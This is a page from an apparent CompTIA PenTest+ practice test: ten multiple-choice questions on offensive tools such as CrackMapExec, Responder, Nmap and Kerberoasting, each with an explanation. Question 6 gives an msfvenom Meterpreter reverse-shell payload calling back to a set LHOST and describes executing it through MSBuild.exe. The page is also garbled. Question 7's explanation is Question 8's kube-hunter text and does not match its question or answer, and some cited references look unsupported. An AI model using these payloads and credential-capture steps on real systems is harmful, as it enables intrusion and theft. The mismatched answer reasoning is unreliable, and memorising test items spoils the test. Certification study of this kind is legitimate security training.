comptia pt0-003 practice test

Exam Title: CompTIA PenTest+

Last update: Nov 27 ,2025
Question 1

[Tools and Code Analysis]
During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine.
Which of the following tools should the penetration tester use to continue the attack?

  • A. Responder
  • B. Hydra
  • C. BloodHound
  • D. CrackMapExec
Answer:

D


Explanation:
When a penetration tester obtains an NTLM hash from a legacy Windows machine, they need to use
a tool that can leverage this hash for further attacks, such as pass-the-hash attacks, or for cracking
the hash. Here’s a breakdown of the options:
Option A: Responder
Responder is primarily used for poisoning LLMNR, NBT-NS, and MDNS to capture hashes, but not for
leveraging NTLM hashes obtained post-exploitation.
Option B: Hydra
Hydra is a password-cracking tool but not specifically designed for NTLM hashes or pass-the-hash
attacks.
Option C: BloodHound
BloodHound is used for mapping out Active Directory relationships and identifying potential attack
paths but not for using NTLM hashes directly.
Option D: CrackMapExec
CrackMapExec is a versatile tool that can perform pass-the-hash attacks, execute commands, and
more using NTLM hashes. It is designed for post-exploitation scenarios involving NTLM hashes.
Reference from Pentest:
Forge HTB: Demonstrates the use of CrackMapExec for leveraging NTLM hashes to gain further
access within a network​​.
Horizontall HTB: Shows how CrackMapExec can be used for various post-exploitation activities,
including using NTLM hashes to authenticate and execute commands​​.
Conclusion:
Option D, CrackMapExec, is the most suitable tool for continuing the attack using an NTLM hash. It
supports pass-the-hash techniques and other operations that can leverage NTLM hashes effectively.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 2

[Attacks and Exploits]
A penetration tester needs to collect information over the network for further steps in an internal
assessment. Which of the following would most likely accomplish this goal?

  • A. ntlmrelayx.py -t 192.168.1.0/24 -1 1234
  • B. nc -tulpn 1234 192.168.1.2
  • C. responder.py -I eth0 -wP
  • D. crackmapexec smb 192.168.1.0/24
Answer:

C


Explanation:
To collect information over the network, especially during an internal assessment, tools that can
capture and analyze network traffic are essential. Responder is specifically designed for this purpose,
and it can capture NTLM hashes and other credentials by poisoning various network protocols.
Here’s a breakdown of the options:
Option A: ntlmrelayx.py -t 192.168.1.0/24 -1 1234
ntlmrelayx.py is used for relaying NTLM authentication but not for broad network information
collection.
Option B: nc -tulpn 1234 192.168.1.2
Netcat (nc) is a network utility for reading from and writing to network connections using TCP or UDP
but is not specifically designed for comprehensive information collection over a network.
Option C: responder.py -I eth0 -wP
Responder is a tool for LLMNR, NBT-NS, and MDNS poisoning. The -I eth0 option specifies the
network interface, and -wP enables WPAD rogue server which is effective for capturing network
credentials and other information.
Option D: crackmapexec smb 192.168.1.0/24
CrackMapExec is useful for SMB-related enumeration and attacks but not specifically for broad
network information collection.
Reference from Pentest:
Anubis HTB: Highlights the use of Responder to capture network credentials and hashes during
internal assessments​​.
Horizontall HTB: Demonstrates the effectiveness of Responder in capturing and analyzing network
traffic for further exploitation​​.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 3

[Attacks and Exploits]
A penetration tester wants to use the following Bash script to identify active servers on a network:
1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done
Which of the following should the tester do to modify the script?

  • A. Change the condition on line 4.
  • B. Add 2>&1 at the end of line 3.
  • C. Use seq on the loop on line 2.
  • D. Replace $h with ${h} on line 3.
Answer:

C


Explanation:
The provided Bash script is used to ping a range of IP addresses to identify active hosts in a network.
Here's a detailed breakdown of the script and the necessary modification:
Original Script:
1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done
Analysis:
Line 2: The loop uses {1..254} to iterate over the range of host addresses. However, this notation
might not work in all shell environments, especially if not using bash directly or if the script runs in a
different shell.
Using seq for Better Compatibility:
The seq command is a more compatible way to generate a sequence of numbers. It ensures the loop
works in any POSIX-compliant shell.
Modified Line 2:
for h in $(seq 1 254); do
This change ensures broader compatibility and reliability of the script.
Modified Script:
1 network_addr="192.168.1"
2 for h in $(seq 1 254); do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 4

[Tools and Code Analysis]
A penetration tester is attempting to discover vulnerabilities in a company's web application. Which
of the following tools would most likely assist with testing the security of the web application?

  • A. OpenVAS
  • B. Nessus
  • C. sqlmap
  • D. Nikto
Answer:

D


Explanation:
When testing the security of a web application, specific tools are designed to uncover vulnerabilities
and issues. Here’s an overview of the tools mentioned and why Nikto is the most suitable for this
task:
Nikto:
Purpose: Nikto is a web server scanner that performs comprehensive tests against web servers for
multiple items, including potentially dangerous files/programs, outdated versions, and other security
issues.
Relevance: It is designed specifically for discovering vulnerabilities in web applications, making it the
most appropriate choice for a penetration tester targeting a web application.
Comparison with Other Tools:
OpenVAS: A general-purpose vulnerability scanner that targets a wide range of network services and
hosts, not specifically tailored for web applications.
Nessus: Similar to OpenVAS, Nessus is a comprehensive vulnerability scanner but is broader in scope
and not focused solely on web applications.
sqlmap: This tool is excellent for SQL injection testing but is limited to database vulnerabilities and
doesn’t cover the full spectrum of web application security issues.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 5

[Information Gathering and Vulnerability Scanning]
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP
services. Which of the following commands should the tester use?

  • A. nmap -sU -sW -p 1-65535 example.com
  • B. nmap -sU -sY -p 1-65535 example.com
  • C. nmap -sU -sT -p 1-65535 example.com
  • D. nmap -sU -sN -p 1-65535 example.com
Answer:

C


Explanation:
To find the state of both TCP and UDP ports using Nmap, the appropriate command should combine
both TCP and UDP scan options:
Understanding the Options:
-sU: Performs a UDP scan.
-sT: Performs a TCP connect scan.
Command
Command: nmap -sU -sT -p 1-65535 example.com
This command will scan both TCP and UDP ports from 1 to 65535 on the target example.com.
Combining -sU and -sT ensures that both types of services are scanned.
Comparison with Other Options:
-sW: Initiates a TCP Window scan, not relevant for identifying the state of TCP and UDP services.
-sY: Initiates a SCTP INIT scan, not relevant for this context.
-sN: Initiates a TCP Null scan, which is not used for discovering UDP services.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 6

[Attacks and Exploits]
A tester plans to perform an attack technique over a compromised host. The tester prepares a
payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the
attack on the host?

  • A. regsvr32 /s /n /u C:\evil.xml
  • B. MSBuild.exe C:\evil.xml
  • C. mshta.exe C:\evil.xml
  • D. AppInstaller.exe C:\evil.xml
Answer:

B


Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the
generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which
can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks
defined in the XML. It’s commonly used to build .NET applications and can also execute code
embedded in project files.
Command Usage:
Command: MSBuild.exe C:\evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild
will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.
mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing
C# code.
AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code
embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file
created by msfvenom.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 7

[Information Gathering and Vulnerability Scanning]
A tester performs a vulnerability scan and identifies several outdated libraries used within the
customer SaaS product offering. Which of the following types of scans did the tester use to identify
the libraries?

  • A. IAST
  • B. SBOM
  • C. DAST
  • D. SAST
Answer:

D


Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies
various vulnerabilities, focusing on weaknesses and misconfigurations. Here’s why option B is
correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations,
insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its
primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the
cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment
rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments,
similar to how kube-hunter operates within Kubernetes clusters​​.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex
environments like Kubernetes clusters​​.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type
of vulnerabilities that kube-hunter is designed to detect.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 8

[Tools and Code Analysis]
A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-
hunter. Which of the following types of vulnerabilities could be detected with the tool?

  • A. Network configuration errors in Kubernetes services
  • B. Weaknesses and misconfigurations in the Kubernetes cluster
  • C. Application deployment issues in Kubernetes
  • D. Security vulnerabilities specific to Docker containers
Answer:

B


Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies
various vulnerabilities, focusing on weaknesses and misconfigurations. Here’s why option B is
correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations,
insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its
primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the
cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment
rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments,
similar to how kube-hunter operates within Kubernetes clusters​​.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex
environments like Kubernetes clusters​​.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type
of vulnerabilities that kube-hunter is designed to detect.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 9

[Reporting and Communication]
Given the following statements:
Implement a web application firewall.
Upgrade end-of-life operating systems.
Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be found?

  • A. Executive summary
  • B. Attack narrative
  • C. Detailed findings
  • D. Recommendations
Answer:

D


Explanation:
The given statements are actionable steps aimed at improving security. They fall under the
recommendations section of a penetration test report. Here’s why option D is correct:
Recommendations: This section of the report provides specific actions that should be taken to
mitigate identified vulnerabilities and improve the overall security posture. Implementing a WAF,
upgrading operating systems, and implementing a secure SDLC are recommendations to enhance
security.
Executive Summary: This section provides a high-level overview of the findings and their
implications, intended for executive stakeholders.
Attack Narrative: This section details the steps taken during the penetration test, describing the
attack vectors and methods used.
Detailed Findings: This section provides an in-depth analysis of each identified vulnerability,
including evidence and technical details.
Reference from Pentest:
Forge HTB: The report's recommendations section suggests specific measures to address the
identified issues, similar to the given statements​​.
Writeup HTB: Highlights the importance of the recommendations section in providing actionable
steps to improve security based on the findings from the assessment​​.
Conclusion:
Option D, recommendations, is the correct section where the given statements would be found in a
penetration test report.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Question 10

[Attacks and Exploits]
During a penetration test, a tester captures information about an SPN account. Which of the
following attacks requires this information as a prerequisite to proceed?

  • A. Golden Ticket
  • B. Kerberoasting
  • C. DCShadow
  • D. LSASS dumping
Answer:

B


Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a
Windows Active Directory environment. Here’s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allows Kerberos to authenticate service
accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The
ticket is encrypted with the service account's NTLM hash. The attacker captures this ticket and
attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral
movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain
admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller,
typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine,
often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct
answer.

vote your answer:
A
B
C
D
A 0 B 0 C 0 D 0
Comments
Page 1 out of 25
Viewing questions 1-10 out of 252
Go To
page 2